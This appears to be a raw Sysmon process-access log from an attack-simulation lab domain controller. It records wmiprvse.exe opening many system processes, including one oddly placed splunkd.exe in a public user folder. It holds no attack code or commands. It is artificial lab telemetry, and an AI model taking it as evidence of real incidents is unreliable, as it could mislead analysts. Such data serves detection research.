15:59:43.334{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027711Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027710Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027709Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027708Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027707Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027706Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027705Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027704Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027703Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027702Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027701Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027700Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027699Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027698Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027697Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027696Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027695Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027694Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027693Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027692Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 